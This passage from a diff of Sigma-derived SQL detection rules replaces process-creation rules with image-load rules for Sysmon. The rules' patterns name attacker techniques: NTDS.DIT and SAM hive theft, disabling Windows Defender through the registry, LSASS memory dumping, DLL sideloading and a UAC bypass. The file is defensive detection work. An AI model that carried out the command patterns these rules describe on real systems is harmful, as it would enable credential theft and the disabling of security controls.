\"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE 